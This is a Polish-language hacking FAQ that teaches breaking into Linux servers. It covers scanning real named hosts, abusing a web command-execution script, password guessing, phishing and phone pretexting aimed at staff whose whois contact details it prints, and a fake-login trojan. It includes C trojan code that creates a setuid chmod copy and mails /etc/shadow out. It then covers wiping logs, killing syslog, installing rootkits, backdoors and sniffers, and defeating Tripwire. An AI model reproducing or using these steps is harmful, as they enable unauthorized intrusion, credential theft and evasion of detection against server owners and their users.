                        @@@@@@@@@@@@@@@@@@
                          xsoti_faq ver1.2
                        @@@@@@@@@@@@@@@@@@

No wiec tak jestem xsoti, nie uwazam sie za hackera i napewno nim nie 
jestem (jeszcze :)) mozna mnie znalezc na irc kanal #viripl. Wszystko 
co tu napisalem wyszlo z mojej glowy a nie z innych faq 
jak to sie czasem zdaza :), dlatego tez faq nie jest specialnie otyle. 
To juz druga odslona, dodalem pare ciekawych rzeczy i mam 
nadzieje ze sie wam one przydadza do czegos. Jesli masz jakies uwagi do faq 
lub chcialbys pomoc mi w jego pisaniu napisz xsoti@wp.pl.



Greetz: pi3ki31ny, Black, Octiv, Raptorek, Wajrus, kordi 
        ^Lothar^, f4lcon, zaibatsu, zero, r00t3rek  
                     
                        No wiec zaczynamy!
 
Zaluzmy ze obrales juz sobie serv do shaczenia, teraz trza obczaic co na
nim sie znajduje. Za przyklad wezmy sobie komputer o adresie
217.97.19.100. Na poczatq powinnismy sprawdzic jaki to jest OS wiec
bierzemy sobie nmapa i odpalamy go z opcja -O np.:
_____________________________________________________________________________

[root@217 root]# nmap -O 217.97.19.100

Starting nmap V. 2.54BETA34 ( www.insecure.org/nmap/ )
Interesting ports on pa100.wagrowiec.sdi.tpnet.pl (217.97.19.100):
(The 1551 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
25/tcp     open        smtp
80/tcp     open        http
443/tcp    open        https
Remote operating system guess: Linux 2.1.19 - 2.2.19
Uptime 0.357 days (since Wed May 19 09:59:52 2010)

Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
_____________________________________________________________________________

No i pieknie znamy juz OS, a nawet otwarte porty, nmap pokazal nam tez 
versie kernela, ale jesli chodzi o kernel nmap nie jest zbyt dokladny - 
rzeczywiscie kernel na tym servie jest z serii 2.2.* ale nie jest to 
2.2.19 lecz 2.2.20 (wiem bo to moj serv :]). Jesli chodzi o Fingerprint w 
nmap to oczywiscie im nowsza versia tego scanera tym lepiej, najbardziej
atualna to bodajrze  nmap V. 3.00. Jesli dokladnie chcemy obadac OS na 
haczonym servie a nie mamy konta (co zakladam z gory w tym tekscie bo 
inaczej to bulka z maslem) to jesli dziala na nim telnetd wystarczy sie na 
niego telnetowac (ale dokonuje odkryc :)) np.:
___________________________________________________________________________

[root@217 root]# telnet pa128.orneta.sdi.tpnet.pl
Trying 217.96.139.128.23...
Connected to pa128.orneta.sdi.tpnet.pl.
Escape character is '^]'.

Red Hat Linux release 6.0 (Hedwig)
Kernel 2.2.5-15 on an i686
login:
__________________________________________________________________________

Wbrew pozorom takich servov z dzialajacym telnetem jest mnustwo i to nie
tylko jakies sdi ale takze tych "powaznych" no ale wrocmy to sprawy,
dzieki tej "metodzie"  wiemy juz troche wiecej tzn. dla bardzo niequmatych
na servie jest rh 6.0 i stary kernel 2.2.5-15, ofkoz taki wpis moze byc
zfalszowany a na servie czaic sie moze na nas jakis slack 8.1, ale to sie
raczej zadko zdaza.  Sprawdzic rodzaj linuksa na servie mozna tez wchodzac
na jego www - jesli nie zostala ona zmieniona to w standardowej conf.
pokaze nam jaka dystrybucja linuksa jest zaintalowana dzialo to np. na
servie ktory dalem jako przyklad z telnetem :). W koncu mozna tez poznac z
jakim linuchem mamy do czynienia po otwartych portach ktore sa typowe dla
danej dystrybucji np. w rh jest to port 98 - linuxconf.
      Teraz skoro wiemy ze nasz system to linuks i wiemy jakie ma otwarte 
porty (a moze nawet znamy jego dystrybucje) mozemy looknac jakie chodza na 
nim demony i wyczaic ew. dziurki. Zeby sprawdzic demona trzeba telnetnac 
sie na port w ktorym takie cus siedzi np.
zeby sprawdzic demona ftp:
____________________________________________________________________________

[root@217 root]# telnet 195.205.148.177 21
Trying 195.205.148.177.21...
Connected to 195.205.148.177.
Escape character is '^]'.
220 server.rio.gov.pl FTP server (Version wu-2.6.2(1) Thu Jan 17 21:10:15 
CET 2002) ready.
help
530 Please login with USER and PASS.
quit
221 Goodbye.
Connection closed by foreign host.
____________________________________________________________________________

Nom w normalnych warunkach (czyt. gdyby dostepny byl anonymous) 
wystarczyla bo odpalic woota i juz mamy roota (ale mi sie rymuje :)) nom. 
dla inteligetnych inaczej dzieki powyzszej operacji dowiadujemy sie, ze na 
servie dziala wu-2.6.2(1), nawiasem mowiac wu-ftpd to jeden z najbardziej 
dziurawych demonow ftp. Czasem telnetujac sie na dany port mozna sie 
dowiedziec jaka dystrybucja na nim dziala np.:
____________________________________________________________________________

[root@217 root]# telnet 217.97.19.100 21
Trying 217.97.19.100.21...
Connected to pa100.wagrowiec.sdi.tpnet.pl.
Escape character is '^]'.
220 pa100.wagrowiec.sdi.tpnet.pl FTP server (PLD GNU/Linux) ready.
___________________________________________________________________________


I juz wiadomo ze mamy do czynienia z pld, ofkoz naglowek ftp mozna 
zmienic, to samo tyczy sie innych demonow. W powyzszy sposob mozna 
sprawidz wszystkie demony (no chyba ze ktos ma w hosts.deny wpis ALL:ALL 
albo podobne badziewie) tzn. telnetujac sie na port na ktorym standardowo 
siedzi dany demon. Mozesz sie spytac: a jaki port na jakim demonie siedzi? 
a to mozna w latwy sposob sprawdzic :) - wystarczy wyedytowac plik 
/etc/services i wszystko stanie sie jasne :). Mozna sie jeszcze pobawic z 
showmount w linuksie i sprawdzic czy cos z danego serva mozna podmontowac 
do siebie :).

Nmap potrafi skanowac cale klasy numerow ip, gdybysmy np. chcieli przeskanowac jakis
wiekszy server to bedzie on mial pewnie wiecej publicznych
numerow ip, nie trzeba skanowac ich wszystkich osobno wystarczy zamiast jednej z klas
dac znaczek * np. nmap 217.97.19.*  przeskanuje cale moje miasto :)

     No dobfa ale powiedzmy ze server ma dosc nowy soft i nie bardzo wiesz 
jak sie do niego zdalnie dobrac wiec trzeba by pomyslec jak zdobyc na nim 
konto, a do tego sa rozne sposoby.
1. cudowne skrypty cgi i php, szczerze mowiac do niedawna
   myslalem
   ze to prehistoria i czytalem o tym w starych faq, ale qmpel - Octiv -
   podsunol mi pare servov na ktorych to dziala np. 
   http://www.thesaiyan.prox.pl
   z php ktorego bezpieczenstwo jest watpliwe :) wiec robimy np. tak:
   http://www.thesaiyan.prox.pl/!test/system.php?cmd=uname%20-a i co sie
   okazuje? ze ten serv jest calkiem nowy wiec istnieje duze
   prawdopodobienstwo ze tez znajdziesz taka dziurke :), a wtedy to
   praktycznie tak jak bys juz mial shella. Tak na marginesie to
   az sie boje co teraz sie stanie z tym serverm ;)


2. Haselko mozna zgadnac, hehe pewnie teraz sie zasmiejesz i powiesz co on 
   mi tu pierdoli co to za sposob, ale to wbrew pozora czesto dziala - sam 
   zdobylem w ten sposob konta na paru shellach. Wezmy za przyklad login
   xsoti mozliwe kombinacje to: xsoti, xsoti123, xsoti321, xsoti.123, 
   itosx, itosx123, xsoti* xsoti1, dupa123, pipa (i inne wulgarne slowa), 
   xso-ti. Jesli wiemy ze lepek jest np. fanem Ich troje (bleeeh) to mozna 
   kabinowac paselka zwiazne z tym "zespolach".

3. Tu jeszcze moze nadmienie jak takowe loginy zdobyc bo to juz inna 
   bajka. Takie loginy mozna znalezc np. na stronie danego servera tyczy 
   sie to szczegulnie wiekszych servov np. kiedy podawany jest kontakt z 
   sekretariatem przez maila czy inne takie, mozna tez sprawdzic fingerem 
   kto aktualnie jest zalogowany w systemie, jesli ofkoz na servie dziala 
   finger np.
_____________________________________________________________________________

[root@217 root]# finger @pa128.orneta.sdi.tpnet.pl
[pa128.orneta.sdi.tpnet.pl]
Login     Name       Tty   Idle  Login Time   Office     Office Phone
root      root      *1      15d  May  4 16:19
_____________________________________________________________________________
    
    w powyzszym przykladzie zalogowany jest tylko root ale zazwyczaj mozna 
    znalezc tez innych userow, a nawet passelko roota mozna odgadnac, 
    pamietam, ze na jedym servie root mial pass jezus a moj qmpem znalazl 
    taki gdzie admin mial pass password, niestety zazwyczaj zdalnie nie 
    mozna logowac sie na roota :<, a nawet lokalnie zeby zrobic su root 
    najczesciej trzeba byc dopisanym do gropy wheel.

4.  Inzynieria socjalna - fajna rzecz, ale trzeba miec troche pewnosci 
    siebie :). kiedy znajdziemy nr. telefonu do pracowniqw danej firmy
    mozemy to nich dryndnac, jak ladnie poprosisz o pass to ci dadza :).
    Kevin Mitnick np. wlamywal sie glownie ta metota poniewaz opiera sie 
    ona na ludzkiej niewiedzy. Mozna miec niewiadomo jak dobrze 
    zabezpieczony serv ale userow debili i nic nas nieustrzeze przed 
    gniewiem hackera ;). Dokladniej polega to na tym ze szukamy nr. 
    telefonu do personelu danej firmy (o tym jak go znalezc puzniej), i 
    np. podajemy sie za admina albo przelozonego (warto znac prawdziwe 
    nazwiska) i mowimy ze dzwonimy w takiej i takiej sprawie i ze np. z 
    powodu awari systemu potrzebujemy czyjes haslo, to co powiesz zalezy 
    tylko od twojej wyobrazni, ale wazne zeby bylo dosc wiarygodne. Jezeli 
    chodzi o znajdywanie numerow to ofkoz mozna je znalezc na stronie, 
    albo po prostu w spisie telefonow pod nazwa danej firmy ;), mozna tez 
    uzyc bardzo przydatnej komedy whois np.:
___________________________________________________________________________

[root@217 root]# whois 193.59.104.11
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:      193.59.104.0 - 193.59.107.255
netname:      SEJM-PL
descr:        Sejm RP
descr:        Warszawa
country:      PL
admin-c:      JO1015-RIPE
admin-c:      AR3161-RIPE
tech-c:       JO1015-RIPE
tech-c:       JM4323-RIPE
status:       ASSIGNED PA
notify:       registry@nask.pl
mnt-by:       AS8308-MNT
changed:      irek@nask.org.pl 19940303
changed:      ripe-dbm@ripe.net 19990706
changed:      marcing@nask.pl 19990826
source:       RIPE

route:        193.59.0.0/16
descr:        NASK (PL)
descr:        Provider Local Registry
origin:       AS8308
notify:       registry@nask.pl
mnt-by:       AS8308-MNT
changed:      pestka@nask.pl 19990713
source:       RIPE

person:       Jadwiga Ostrowska
address:      Kancelaria Sejmu RP
address:      Wiejska 4/6
address:      00-902 Warszawa
address:      POLAND
phone:        +48 2 6942490
fax-no:       +48 2 6942453
nic-hdl:      JO1015-RIPE
changed:      irek@nask.org.pl 19940303
changed:      ripe-dbm@ripe.net 19990615
source:       RIPE

person:       Andrzej Rybak
address:      Kancelaria Sejmu RP
address:      Wiejska 4/6
address:      00-902 Warszawa
address:      POLAND
phone:        +48 2 6941492
fax-no:       +48 2 6942453
nic-hdl:      AR3161-RIPE
changed:      irek@nask.org.pl 19940303
changed:      ripe-dbm@ripe.net 19990615
source:       RIPE

person:       Jerzy Mocala
address:      Kancelaria Sejmu RP
address:      Wiejska 4/6
address:      00-902 Warszawa
address:      POLAND
phone:        +48 2 6942066
fax-no:       +48 2 6942453
nic-hdl:      JM4323-RIPE
changed:      irek@nask.org.pl 19940303
changed:      ripe-dbm@ripe.net 19990615
source:       RIPE

No tu to sie juz dowiedzielismy wielu ciekawych rzeczy nawet mi sie
objasniac nie chce :) ale sa tu loginy, maile, nr. telefonow, adresy
czego tylko dusza zapragnie :). Mozna nawet przebrac sie za
sprzataczke i isc servy obrabiac ;) (czego w sumie to byl odradzal na
rzadowym servie).


5. Jesli znajdziemy mejle do uzytkownikow danego servera czy tez same 
   loginy userow mozemy napisac maila na adres login@server, przykladowo
   na serverze wacek.com.pl jest user wacus wiec maila piszemy na adres 
   wacus@wacek.com.pl (na serverze musi dzialac pop3), jesli wszystkie te 
   warunki sa spelnione zakladamy gdzies konto mejlowe z falszywymi danymi
   osobowymi ofkoz, moze to byc np. wacus@wp.pl i z tego konta wysylamy maila
   do userow, w ktorym musimy ich przekonac ze jestesmy adminami servera 
   wacek.com.pl i ze przeslanie swoich hasel na maila wacus@wp.pl jest 
   niezbetne, to co napiszecie zalezy od waszej wyobrazni, ale musi byc
   to cos przekonywujacego, userow najlepiej brac na strach - nie przeslesz
   hasla bede musial ci zablokowac konto :). Wystarczy ze chociaz jeden z 50 
   userow da sie nabrac, a wiadomo glupkow nie braqje :).

6. Ta metoda jest bardzo podobna do 5 tyle ze zamiast namawiac userow do 
   przeslania hasla naglaniamy ich to uruchomienia programu w zalaczniq
   najlepiej zeby to byl jakis skapilowany prog w c, teraz co tu zrobic 
   zeby taki user to uruchomil, no coz trzeba program tak przedstawic 
   zeby ten ktos chcial to zrobic, wiadomo faceci najlepiej leca na porno,
   mozna napisac ze to opowiesci erotyczne albo cos w tym stylu :), mozna
   tez skrobnac ze to najnowszy sploit na kernel 2.2.21 i 2.2.18, najlepiej
   remote :), to co napiszesz zalezy tylko od ciebie, a czym naprawde ma byc 
   taki program? mysle ze najlepszym wyborem jest fake login ktory dopisze 
   do .profile i kiedy user zaloguje sie nastepnym razem zaraz po zalogowaniu 
   da clear wyswietli Login incorrect i poprosi o podanie hasla jeszcze raz 
   z tym ze wysle je na naszego maila :).
  
   Dobra zaluzmy ze jakims cudem zdobyles to konto i masz juz wieksze pole do 
popisu przedstawie tu standardowe kroki tak jak ja to zazwyczaj robie.
Na poczatek warto zatrzec nasze kroki wiec wydajemy komede 
ln -sf .history /dev/null
Jeszcze lepsze jest zdjecie mozliwosci zapisu do pliq przez chmod -w .history
teraz trzeba by sprawdzic dokladniej na czym stoimy wiec wklepujemy co 
nastepuje :) :
bash --version
echo $machtype
cat /etc/issue.net
cat /etc/issue
cat /proc/version
uname -a
cd /usr/share/doc - tam mamy wiele ciekawych rzeczy
teraz powinnismy juz mniejwiecej wszystko czaic a w naszej glowce powoli 
zaczyna rodzic sie piekielny plan zdobycia wladzy nad serverem :).
Aha jezeli nie mozemy odpalic danego programu poniewaz admin odciol nam
od niej dostep wystarczy posluzyc sie biblioteka ld-linux.so.2 ktora sluzy
do odpalania progow, wiec wykozystamy ja zgodnie z jej przeznaczeniem :)).
wystarczy wklepac np. /lib/ld-linux.so.2 /bin/uname -a i powinno
zadzialac, ta sama biblioteke mozemy wykozystac kiedy mamy partycje /home
zamontowana z no-exec, przyklad:
xsoti@217:~$ uname
sh: /usr/bin/uname: Permission denied
xsoti@217:~$ /lib/ld-linux.so.2 /usr/bin/uname
Linux

Gdyby przypadkiem w naszym systemie nie bylo takiej biblioteki zamiennie 
mozna uzyc biblioteki ld-2.2.4.so i paru innych ktorych nazw juz nie 
pamietam... :)

Jesli to nie pomoze mozemy sobie sciagnac swoje wlasne uname bo w koncu to 
tylko program i uruchomic je ze swojego katalogu domowego.

   Teraz kiedy juz wiesz co jest grane i jakie jest oprogramowanie na 
servie nadszedl chyba w sumie czas na poszukanie sploita. Jesli 
nie masz sploita a wiesz ze adminem jest jakis nadgorliwy psych
i czyta wszystkim historie to mozesz 
napisac jakiegos prostego trojana i ladnie spreparowac historie zeby admin 
myslal ze to sploit ktory dal ci roota a wtedy mozliwe ze taki lep sam go 
odpali :) taki pseudo trojan moze wygladac np. tak:
_____________________________________________________________________________

#include<unistd.h>
#include <stdlib.h>
main()
{
printf("\n You have root... have lot fun! \n");
system("cp /bin/chmod /bin/chmodzik");
system("chmod 777 /bin/chmodzik");
system("chmod +s /bin/chmodzik");
system("cat /etc/shadow | mail xsoti@wp.pl");
}

_______________________________________________________________________________

Powinno zadzialac, wiem ze to nie jest zaden hax0rski program, ale za mnie zaden
programista 
jak na razie wiec nie ma co sie dziwic :). Wystarczy teraz ze taki program
skapilujemy i 
uruchomimy (zrodlo z wiadomych powodow lepiej usunac :) ) potem robimy np.
cd /root
ls
cat /etc/shadow |mail twoj_mail
i takie tam. Nasz "trojan" na wszelki wypadek przsyla nam jeszcze shadowa 
wrazie gdyby admin sie spenkal i wywalil nam konto, maila na ktory jest 
wysylany shadow oczywiscie mozna zmienic, choc nie trzba... ;).
Jesli admin odpali ten program mozemy uzyc chmodzika wedle naszego uznania
np. chmodzik o+w /etc/passwd i wtedy zmienic sobie uid guid na 0 albo 
jak sie tylko chce wazne ze mamy juz prawa roota w kieszeni :).

Przed wlamem powinno sie przejrzec /etc/syslog.conf, wogule trzeba dbac o
bezpieczenstwo
(czesto o tym zapominam), a jesli juz wpadniemy to trzeba umiec umiejetnie gadac z
adminem
zadko zdaza sie taki CH*J co mysli tylko jak tu czlowieka udupic i od razu wysyla
logi do 
tepsy zazwyczaj admin zagada prez talk czy write i wtedy trzeba sie zachowac tak
zeby mu sie 
odechcialo wysylac logi do abuse - jestem tego zywym przykladem znam dobrze jednego
ziomala, 
na poczatq naszej znajomosci
prawie mnie udupil w tepsie a teraz to jeden z moich best friend (pozdrofka :)). Po
za tym
na servie powinnismy zachowywac sie qlturalnie nie usuwac niczych danych "nie psocic
sie :)",
i najlepiej nie podmieniac strony, a jesli juz musimy to zrobic powinno sie zostawic
kopie
zapasowa oryginalu.

Mozemy tez sprawdzic czy ktos nas nie uprzedzil i nie wlamal sie przed nami,
w tym celu przegladamy inetd.conf czy nie ma tam jakiegos lamskiego backdoora
/etc/passwd aby sprawdzic czy jakis user nie ma przypadkiem uida guida 0,
szukamy nietypowych plikow i katalogow, skanujemy porty aby sprawdzic czy nie 
znajdziemy jakiegos egzotycznego na ktorym mogl by byc zainstalowany backdoor.
Wyszukujemy wszystkie suidy a noz okaze sie ze znajdziemy program ktory ma suida
a nie powinien go miec? Kto wie wszystko jest mozliwe :)
    No dobra co jesli masz juz roota? Po pierwsze trzeba sie wyczyscic z
logow zeby nas nie udupili. Pierwsza rzecz jaka robimy to edycja
syslog.conf w katalogu /etc tam zapisane jest gdzie logi wedruja. Potem
sciagamy z jakies page killloga i go odpalamy, jesli logi sa standardowo
zapisywane to polowa roboty juz za nami, jesli nie, to trzeba killoga
skapilowac z troche innymi parametrami - wystarczy looknac w zrodlo. Na
wszelki wypadek warto jeszcze wklepac find / -name wtmp i find / -name
utmp. Demona sysloga i kloga najelepiej zabic >:) wiec piszemy killall
syslogd klogd. Teraz trzeba by sie wyczyscic z /var/log/secure i
/var/log/messages bo z tego co wiem killlog tego nie za nas nie robi :\,
najlepiej walnac echo -n /var/log/secure i sie za duzo nie bawic :) chyba
ze ktos ma ochote edytowac te pliki. Teraz warto zobaczyc czy jakis
dodatkowy program nie loguje naszych poczynan w systemie piszemy wiec ps
-aux | more i tam trzeba takiego cholerstwa szukac. No teraz to juz
naszego ip raczej nie znajda, tak wogule to nie musze chyba mowic ze na
haczone servy najlepiej robic pentelki. Ale sprawdzimy co sie stanie jesli
admin napisze netstat, nom juz widze zalamke na twojej twarzy :), program
pokazal ze jest z komputerem nawiazane jakies polaczenie i teraz jesli
admin wpisze who i nie pokaze mu zalogowanego usera i wpisze netstat i
pokaze mu polaczenie to zacznie myslsec (!) hyhy nie smiej sie admini tez
czasem mysla ;>. Zeby netstat i inne takie badziewia nas nie wydaly
trzeba uzyc rootkita, jest to pakiet programow do podmieniania narzedzi
takich jak neststat ps i takie tam, na temat rootkisow nie bede sie
rozpisywal powiem tylko ze pelno tego jest na stronie
www.packetstormsecurity.com a uzywania ich nauczymy sie po przeczytaniu
pliq README ktory powinien byc razem z rootkitem. Mozna tez poszukac
zainstalowanych w systemie pakietow poleceniam rpm -qa | more, a nuz
znajdziemy jakis logcheck albo inny syf :). Po wlamaniu sie na server nie
warto podmieniac strony (sam to niedawno odkrylem :)) chyba ze chcemy
posmiac sie z admina bo go nie lubimy =], znacznie lepiej jest wykozystac
go do innych celow. Z takiego serva mozemy atakowac inne servy, odpalic
sniffera i zdobyc loginy i hasla to shelli czy skrzynek pocztowych userow,
czytac poczte innych uzytkownikow - wiem ze to nieetyczne no ale coz
trzeba przyznac ze to fajna zabawa ;>>. Po wlamaniu warto zainstalowac w
servie troche backdoorow na wszelki wypadek gdyby admin sie kapnol.  
Raczej odradzam dopisywanie dodatkowej uslugi w inetd.conf czy dodawanie
usera z uid guid 0 bo admin szybko takie cos wychwyci, najlepiej chyba
zainstalowac jakiegos pozadnego backdoora napisanego w c, osobiscie 
polecam backdoor kit ktrory instaluje dodatkowe ssh na wybranym porcie
i ustawia "zapasowe" wybrane haslo roota :). Warto tez
przeslac sobie na maila shadowa ktorego potem mozna odkodowac jakims
lamaczem haslel - polecam johna the rippera.
  
To sa podstawowe informacje teraz moze nie wiesz jak zdobyc servy na 
petelke a no sposob jest prosty istnieje exploit massrooter, jest
to wlasciwie taki pack kilq starszych sploitow, nie jest to raczej zbyt
eleganckie wyjscie ale cuz lepsze cos niz nic :), odpalamy wiec tego sploita
ustawiamy jakie bugi ma sprawdzac i wpisujemy siakies ip, a program sam zacznie
wyszukiwac slabych servow ktore potem bedziemy mogli uzyc jaki petelek
w celu wlamania sie na jakis konkretny wybrany przez na server.

Jesli uda nam sie juz wlamac dobrze jest zainstalowac jakiegos sniffera
dzieki ktoremu bedziemy mogli zobyc wiecej hasel, dobrym wyborem na poczatek
jest sniff poniewaz jest on prosty i dosc skuteczny, o to jak sie go uzywa:
sh-2.05# ./sniff eth0 >log & znadzek & oznacza ze bedzie on pracowal w tle.
Teraz mozemy sledzic logi na maszynie i mamy 
duze szanse ze trafi nam sie jakies konto. Sniffera najlepiej
instalowac na routerze poniewaz przez niego przechodzi najwiecej pakietow, jesli
zainstalujemy go jakims komputerze z sieci lokalnej mozemy nie uzyskac takich dobrych
wynikow.

Wiele osob na swoim koncie shellowym w katalogu domowym ma zapisane loginy i hasla
do innych swoich shelli, warto przejzec katalogi domowe uzytkownikow w poszukiwaniu
takich plikow.

Dobrym pomyslem jest przejzenie pliq /etc/hosts, mozliwe ze nasz komputer na duza siec 
lokalna w ktorej znajdziemy wiecej komputerow czekajacych na wlam :) jesli 
tak sie stanie odpalamy nmapa, jako przyklad dam moj komputer chociaz moja "siec"
sklada sie z dwoch kompow - windowsa staruszka i mojego linuksa :).:

---------------------------------------------------------------------------------
root@217:/xsoti# cat /etc/hosts

# For loopbacking.
127.0.0.1       localhost
192.168.0.1     linux
192.168.0.2             windows
# End of hosts.

root@217:~# nmap -sS -O 192.168.0.*

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on linux (192.168.0.1):
(The 1594 ports scanned but not shown below are in state: closed)
Port       State       Service
xxx/tcp    open        xxx
xxx/tcp    open        xxx
xxx/tcp    open        xxx
xxx/tcp    open        xxx
No exact OS matches for host (If you know what OS is running on it, see 
http://www.insecure.org/cgi$TCP/IP fingerprint:
SInfo(V=3.00%P=i586-pc-linux-gnu%D=8/17%Time=4C6A79C0%O=21%C=1)
TSeq(Class=RI%gcd=1%SI=2B6CBB%IPID=Z%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=2B6D8C%IPID=Z%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=2B6D7C%IPID=Z%TS=100HZ)
T1(Resp=Y%DF=Y%W=4000%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
Uptime 1.555 days (since Mon Aug 16 00:41:16 2010)

Interesting ports on windows (192.168.0.2):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
139/tcp    open        netbios-ssn
1550/tcp   open        3m-image-lm
Remote OS guesses: Turtle Beach AudioTron Firmware 3.0, Windows NT4 or 95/98/98SE

Nmap run completed -- 256 IP addresses (2 hosts up) scanned in 65 seconds
----------------------------------------------------------------------------------
W przypadq komputera o ip 192.168.0.1 numery portow sam wyxowalem :).
Gdyby drugi komputer o ip 192.168.0.2 byl linuksem mozna by sie do niego prubowac
wlamac
sytuacja byla by o tyle latwiejsza ze wlamalismy sie komputer o ip lokalnym 
192.168.0.1 ktory w tym przypadq jest serverem i przez niego ida wszystkie pakiety
z komputera o ip 192.168.0.2 (dzieki temu moge podgladac jakie strony staruszek
oglada w internecie hehehe >:P).

Obchodzenie tripwira

Tripwire to taki wsiurski program ktory alarmuje admina o wlamie jak to robi?
ano tworzy obraz wybranych przez admina plikow i gdy ktorys z nich 
ulegnie zmianie wysyla o tym informacje do roota, czyli jesli np.
admin wybieze zeby miedzy innymi plik chmod byl sprawdzany a my mu damy
suida admin sie o tym dowie, no i dupa zimna. Ale nic na wszystko sie da cos poradzic
qmpel pi3ki31ny wpadl na pomysl ze takie cos mozna obejsc i za jego zgodom
zamieszcze tu
jak to zrobic, nie zapewniem ze to bedzie dzialac bo jest to tylko taka nasza teoria,
jeszcze nie sprawdzona... :>. No wiec tak pierw trzeba wogule sprawdzic czy na haczonym
servie znajduje sie tripwire w wiekszosci linoksow sprawdzimy to poleceniem 
rpm |qa |grep tripwire , w slackware ls /var/log/packages |grep tripwire
mozliwe ze jesli nawet te komedy nie pokaza tripwira to jednak znajduje sie on w
systemie
warto wiec dodaktowo wklepac whereis tripwire i locate tripwire - dwie bardzo
przydatne komedy. Dora teraz co zrobic jesli sie okaze ze tripwire jest w systemie,
na poczatek trzeba odciac mozliwosc przesylania maili do roota chmod -w /var/mail/root
powinno zalatwic sprawe, teraz skopuj plik twpol.txt do jakiegos swojego katalogu,
nastepnie 
odinstalowywujemy tripwire komede rpm -e tripwire
czy w slackware removepkg tripwire, nie denerwoj sie to jeszcze nie koniec :>,
teraz na tym systemie instalujemy swoje tripwire tyle ze plik twpol.txt ktory zawiera
pliki z ktorych bedzie tworzyl obraz systemu, troche zmodifikujemy :). teraz tworzymy 
obraz jesteszcze raz  :P teraz wrzucamy stary plik
twpol.txt do /etc/tripwire, zeby admin sie nie kapnol przypadkiem, sposub ten ma
jedna spora 
wade admin moze kapnac sie ze jest cos nie tak z tripwire jesli np. zainstaluje nowy
prog w 
/bin (tripwire standardowo tworzy obraz calego /bin) i nie dostanie raportu o
zmianie, dlatego
twpol.txt nie nalezy zbytnio ukrucac. Przed usunieciem tripwira z systemu warto tez
zrobic
kopie zapasowa /var/lib/tripwire/report, jesli tego nie zrobimy a admina najdzie
ochota 
sprawdzenia starszych rapotrow moze sie on troche zdziwic...



No dobra daje ci juz spoqj jesli to co tutaj naskrobalem w czyms ci pomoglo to
bardzo sie 
ciesze, znaczy to ze moja robota nie poszla na marne jesli ci to nie pomoglo to sa 
trzy warjanty: albo wszystko to juz umiales i czytanie tego faq bylo dla 
ciebie strata czasu, albo nie zrozumiales nic z tego co tu jest napisane i 
jestes debilem (czlowiek o niskim IQ), albo to ja jestem debilem bo... nie 
wiem co ale innego wyjscia nie widze :). No dobra nie bede sie rozpisywal 
tylko zaczne konczyc, jesli faq jednak ci sie spodobalo i chcial bys 
ujrzec nastepne, albo nawet pomoc mi w jego napisaniu to pisz na maila 
xsoti@wp.pl paps.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
JESLI CHCESZ MOZESZ ZAMIESCIC TO FAQ NA SWOJEJ STRONIE CZY POKAZAC ZNAJOMYM ALE 
                      NIE ZMIENIAJ JEGO ZAWARTOSCI
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@